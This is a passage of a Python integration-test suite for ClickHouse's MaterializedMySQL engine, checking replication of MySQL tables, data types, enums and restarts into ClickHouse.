mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
# Once ClickHouse has dumped all the historical data we can query it in ClickHouse,
# but that does not mean the sync thread has already connected to MySQL.
# So after ClickHouse can serve the data, insert some rows into MySQL and use them to re-check that syncing succeeded.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query_with_retry("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query_with_retry("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
def table_table(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_test")
clickhouse_node.query("DROP DATABASE IF EXISTS table_test")
mysql_node.query("CREATE DATABASE table_test")
# Test that the table name 'table' works as expected
mysql_node.query("CREATE TABLE table_test.table (id INT UNSIGNED PRIMARY KEY)")
mysql_node.query("INSERT INTO table_test.table VALUES (0),(1),(2),(3),(4)")
clickhouse_node.query("CREATE DATABASE table_test ENGINE=MaterializeMySQL('{}:3306', 'table_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT(*) FROM table_test.table", "5\n")
mysql_node.query("DROP DATABASE table_test")
clickhouse_node.query("DROP DATABASE table_test")
def table_overrides(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("CREATE DATABASE table_overrides")
mysql_node.query("CREATE TABLE table_overrides.t1 (sensor_id INT UNSIGNED, timestamp DATETIME, temperature FLOAT, PRIMARY KEY(timestamp, sensor_id))")
for id in range(10):
mysql_node.query("BEGIN")
for day in range(100):
mysql_node.query(f"INSERT INTO table_overrides.t1 VALUES({id}, TIMESTAMP('2021-01-01') + INTERVAL {day} DAY, (RAND()*20)+20)")
mysql_node.query("COMMIT")
clickhouse_node.query(f"""
CREATE DATABASE table_overrides ENGINE=MaterializeMySQL('{service_name}:3306', 'table_overrides', 'root', 'clickhouse')
TABLE OVERRIDE t1 (COLUMNS (sensor_id UInt64, temp_f Nullable(Float32) ALIAS if(isNull(temperature), NULL, (temperature * 9 / 5) + 32)))
""")
check_query(
clickhouse_node,
"SELECT type FROM system.columns WHERE database = 'table_overrides' AND table = 't1' AND name = 'sensor_id'",
"UInt64\n")
check_query(
clickhouse_node,
"SELECT type, default_kind FROM system.columns WHERE database = 'table_overrides' AND table = 't1' AND name = 'temp_f'",
"Nullable(Float32)\tALIAS\n")
check_query(clickhouse_node, "SELECT count() FROM table_overrides.t1", "1000\n")
mysql_node.query("INSERT INTO table_overrides.t1 VALUES(1001, '2021-10-01 00:00:00', 42.0)")
check_query(clickhouse_node, "SELECT count() FROM table_overrides.t1", "1001\n")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
def materialized_database_support_all_kinds_of_mysql_datatype(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_datatype")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_datatype")
mysql_node.query("CREATE DATABASE test_database_datatype DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("""
CREATE TABLE test_database_datatype.t1 (
`v1` int(10) unsigned AUTO_INCREMENT,
`v2` TINYINT,
`v3` SMALLINT,
`v4` BIGINT,
`v5` int,
`v6` TINYINT unsigned,
`v7` SMALLINT unsigned,
`v8` BIGINT unsigned,
`v9` FLOAT,
`v10` FLOAT unsigned,
`v11` DOUBLE,
`v12` DOUBLE unsigned,
`v13` DECIMAL(5,4),
`v14` date,
`v15` TEXT,
`v16` varchar(100) ,
`v17` BLOB,
`v18` datetime DEFAULT CURRENT_TIMESTAMP,
`v19` datetime(6) DEFAULT CURRENT_TIMESTAMP(6),
`v20` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
`v21` TIMESTAMP(6) DEFAULT CURRENT_TIMESTAMP(6),
/* todo support */
# `v22` YEAR,
# `v23` TIME,
# `v24` TIME(3),
# `v25` GEOMETRY,
`v26` bit(4),
# `v27` JSON DEFAULT NULL,
# `v28` set('a', 'c', 'f', 'd', 'e', 'b'),
`v29` mediumint(4) unsigned NOT NULL DEFAULT '0',
`v30` varbinary(255) DEFAULT NULL COMMENT 'varbinary support',
`v31` binary(200) DEFAULT NULL,
`v32` ENUM('RED','GREEN','BLUE'),
PRIMARY KEY (`v1`)
) ENGINE=InnoDB;
""")
mysql_node.query("""
INSERT INTO test_database_datatype.t1 (v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v31, v32) values
(1, 11, 9223372036854775807, -1, 1, 11, 18446744073709551615, -1.1, 1.1, -1.111, 1.111, 1.1111, '2021-10-06', 'text', 'varchar', 'BLOB', '2021-10-06 18:32:57', '2021-10-06 18:32:57.482786', '2021-10-06 18:32:57', '2021-10-06 18:32:57.482786', b'1010', 11, 'varbinary', 'binary', 'RED');
""")
clickhouse_node.query(
"CREATE DATABASE test_database_datatype ENGINE = MaterializeMySQL('{}:3306', 'test_database_datatype', 'root', 'clickhouse')".format(
service_name))
check_query(clickhouse_node, "SELECT name FROM system.tables WHERE database = 'test_database_datatype'", "t1\n")
# full synchronization check
check_query(clickhouse_node, "SELECT v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v32 FROM test_database_datatype.t1 FORMAT TSV",
"1\t1\t11\t9223372036854775807\t-1\t1\t11\t18446744073709551615\t-1.1\t1.1\t-1.111\t1.111\t1.1111\t2021-10-06\ttext\tvarchar\tBLOB\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t10\t11\tvarbinary\tRED\n")
mysql_node.query("""
INSERT INTO test_database_datatype.t1 (v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v31, v32) values
(2, 22, 9223372036854775807, -2, 2, 22, 18446744073709551615, -2.2, 2.2, -2.22, 2.222, 2.2222, '2021-10-07', 'text', 'varchar', 'BLOB', '2021-10-07 18:32:57', '2021-10-07 18:32:57.482786', '2021-10-07 18:32:57', '2021-10-07 18:32:57.482786', b'1011', 22, 'varbinary', 'binary', 'GREEN' );
""")
# incremental synchronization check
check_query(clickhouse_node, "SELECT v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v32 FROM test_database_datatype.t1 ORDER BY v1 FORMAT TSV",
"1\t1\t11\t9223372036854775807\t-1\t1\t11\t18446744073709551615\t-1.1\t1.1\t-1.111\t1.111\t1.1111\t2021-10-06\ttext\tvarchar\tBLOB\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t10\t11\tvarbinary\tRED\n" +
